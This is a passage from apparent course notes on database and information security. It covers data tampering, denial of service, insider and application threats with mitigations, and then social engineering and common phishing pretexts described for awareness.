instead, log errors securely for debugging purposes.
6. Security Testing: Regularly test and audit your application for SQL
injection vulnerabilities using automated tools and manual testing
techniques.
3. Data Tampering: Data tampering refers to the unauthorized modification,
deletion, or alteration of data in a database or system. This can be done
intentionally or unintentionally, and can have serious consequences,
including:
 Data corruption: Incorrect or inconsistent data, leading to inaccurate
analysis or decision-making.
 Data loss: Permanent deletion or alteration of critical data.
 Security breaches: Tampered data can be used to gain unauthorized access
or exploit vulnerabilities.
 Compliance issues: Tampering can lead to non-compliance with
regulatory requirements.
 Reputation damage: Data tampering can erode trust in an organization's
data management practices.
Types of data tampering:
 Insertion: Adding new, unauthorized data.
  Deletion: Removing existing data without permission.
 Modification: Altering existing data without authorization.
 Manipulation: Changing data to conceal or distort information.
To prevent data tampering:
i. Access controls: Implement robust authentication, authorization, and
accounting (AAA) mechanisms.
ii. Data encryption: Protect data in transit and at rest.
iii. Auditing and logging: Monitor and track all data modifications.
iv. Data backup and recovery: Regularly backup data and have a recovery
plan in place.
v. Data validation: Verify data integrity and consistency.
vi. User education: Raise awareness about data tampering risks and
consequences.
ii. Data Breach: Sensitive data exposed or stolen, often due to inadequate
security measures.
4. Denial of Service (DoS): Denial of Service (DoS) is a type of cyberattack
that aims to make a database or system unavailable to users by
overwhelming it with traffic or requests, exhausting its resources, or
disrupting its services. This can be done in various ways, including:
 Flooding: Sending excessive traffic or requests to overwhelm the
system.
 Resource exhaustion: Consuming system resources, such as CPU,
memory, or bandwidth.
 Network disruption: Disrupting network connectivity or
communication.

Types of DoS attacks:

 Volumetric attacks: Flooding with high-volume traffic.
 Protocol attacks: Exploiting protocol vulnerabilities.
  Application attacks: Targeting specific applications or services.
 Distributed Denial of Service (DDoS): Coordinated attacks from
multiple sources.
To prevent or mitigate DoS attacks:
 Network security measures: Firewalls, intrusion detection systems,
and rate limiting.
 Resource scaling: Scalable infrastructure to handle increased traffic.
 Traffic filtering: Filtering out malicious traffic.
 Monitoring and incident response: Detecting and responding to
attacks quickly.
 DDoS protection services: Specialized services to mitigate DDoS
attacks.
 Regular security updates and patches: Keeping systems and
software up-to-date.
5. Malware: Malicious software compromising database security, potentially
leading to data theft or corruption.

6. Insider Threats: Insider threats refer to security risks or vulnerabilities that

originate from within an organization, typically from employees, contractors,
or other individuals with authorized access to the database or system. Insider
threats can be intentional or unintentional and can cause significant harm to
the organization.
I. Malicious insiders: Intentionally compromising security for
personal gain or revenge.
II. Accidental insiders: Unintentionally causing security breaches due
to negligence or lack of awareness.
III. Compromised insiders: Authorized personnel who have been
manipulated or coerced into compromising security.
Common insider threat scenarios:
  Data theft or exfiltration
 Unauthorized access or privilege escalation
 Data tampering or manipulation
 System compromise or sabotage
 Intellectual property theft
7. Physical Threats: Unauthorized physical access to database servers or
storage media.
8. Network Threats: Exploitation of network vulnerabilities to access or
compromise the database.
9. Application Threats: Vulnerabilities in database applications or interfaces
exploited to gain unauthorized access, manipulate data, or disrupt services.
Common application threats include:
1. SQL Injection: Injecting malicious SQL code to manipulate data or gain
access.
2. Cross-Site Scripting (XSS): Injecting malicious code into web
applications to steal data or take control.
3. Cross-Site Request Forgery (CSRF): Tricking users into performing
unintended actions.
4. Buffer Overflow: Exploiting buffer overflow vulnerabilities to execute
malicious code.
5. Input Validation: Failing to validate user input, allowing malicious data to
enter the database.
6. Authentication and Authorization: Weak or flawed authentication and
authorization mechanisms.
7. Sensitive Data Exposure: Exposing sensitive data, such as credit card
numbers or passwords.
8. Broken Authentication: Weak or flawed authentication mechanisms.
9. Security Misconfiguration: Misconfigured security settings or features.
To mitigate these threats, implement robust security measures, including:
  Access controls and authentication
 Encryption and secure storage
 Regular backups and auditing
 Secure coding practices
 Network and system security
 Monitoring and incident response
 User education and awareness

Hacking and social engineering

 Social engineering is the art of manipulating people so they give up

confidential information.
 The types of information these criminals are seeking can vary.
 But when individuals are targeted, the criminals are usually trying to
trick you into giving them your passwords or bank information, or access
your computer to secretly install malicious software – that will give them
access to your passwords and bank information as well as giving them
control over your computer.
 Criminals use social engineering tactics because it is usually easier to
exploit your natural inclination to trust than it is to discover ways to hack
your software.
 For example, it is much easier to fool someone into giving you their
password than it is for you to try hacking their password (unless the
password is really weak).
  Ask any security professional and they will tell you that the weakest link
in the security chain is the human who accepts a person or scenario at
face value. It doesn’t matter how many locks and deadbolts are on your
doors and windows, or if have guard dogs, alarm systems, floodlights,
fences with barbed wire, and armed security personnel; if you trust the
person at the gate who says he is the pizza delivery guy and you let him
in without first checking to see if he is legitimate you are completely
exposed to whatever risk he represents.

What Does a Social Engineering Attack Look Like?

Email from a friend
 If a criminal manages to hack or socially engineer one person’s email
password they have access to that person’s contact list – and because most
people use one password everywhere, they probably have access to that
person’s social networking contacts as well.
 Once the criminal has that email account under their control, they send
emails to all the person’s contacts or leave messages on all their friend’s
social pages, and possibly on the pages of the person’s friend’s friends.
Taking advantage of your trust and curiosity, these messages will:
 Contain a link that you just have to check out – and because the link
comes from a friend and you’re curious, you’ll trust the link and click –
and be infected with malware so the criminal can take over your machine
and collect your contacts info and deceive them just like you were
deceived.
 Contain a download of pictures, music, movie, document, etc., that has
malicious software embedded. If you download – which you are likely to
do since you think it is from your friend – you become infected. Now, the
criminal has access to your machine, email account, social network
 accounts and contacts, and the attack spreads to everyone you know. And
on, and on.
Email from another trusted source
 Phishing attacks are a subset of social engineering strategy that imitate a
trusted source and concoct a seemingly logical scenario for handing over
login credentials or other sensitive personal data. According to Webroot
data, financial institutions represent the vast majority of impersonated
companies and, according to Verizon's annual Data Breach Investigations
Report, social engineering attacks including phishing and pretexting (see
below) are responsible for 93% of successful data breaches.
Using a compelling story or pretext, these messages may:
 Urgently ask for your help. Your ’friend’ is stuck in country X, has been
robbed, beaten, and is in the hospital. They need you to send money so
they can get home and they tell you how to send the money to the
criminal.
 Use phishing attempts with a legitimate-seeming background.
Typically, a phisher sends an e-mail, IM, comment, or text message that
appears to come from a legitimate, popular company, bank, school, or
institution.
 Ask you to donate to their charitable fundraiser, or some other
cause. Likely with instructions on how to send the money to the criminal.
Preying on kindness and generosity, these phishers ask for aid or support
for whatever disaster, political campaign, or charity is momentarily top-
of-mind.
 Present a problem that requires you to "verify" your information by
clicking on the displayed link and providing information in their
form. The link location may look very legitimate with all the right logos,
and content (in fact, the criminals may have copied the exact format and
content of the legitimate site). Because everything looks legitimate, you
 trust the email and the phony site and provide whatever information the
crook is asking for. These types of phishing scams often include a
warning of what will happen if you fail to act soon because criminals
know that if they can get you to act before you think, you’re more likely
to fall for their phishing attempt.
 Notify you that you’re a ’winner.’ Maybe the email claims to be from a
lottery, or a dead relative, or the millionth person to click on their site,
etc. In order to give you your ’winnings’ you have to provide information
about your bank routing so they know how to send it to you or give your
address and phone number so they can send the prize, and you may also
be asked to prove who you are often including your social security
number. These are the ’greed phishes’ where even if the story pretext is
thin, people want what is offered and fall for it by giving away their
information, then having their bank account emptied, and identity stolen.
 Pose as a boss or coworker. It may ask for an update on an important,
proprietary project your company is currently working on, for payment
information pertaining to a company credit card, or some other inquiry
masquerading as day-to-day business.

Difference
 Differing from the traditional type of hacker, who modifies a computer's
software and hardware structure to carry out certain tasks, social
engineering uses people as weapons to attack select targets.
 In this way the manipulation is accomplished by employing trust through
different forms of communication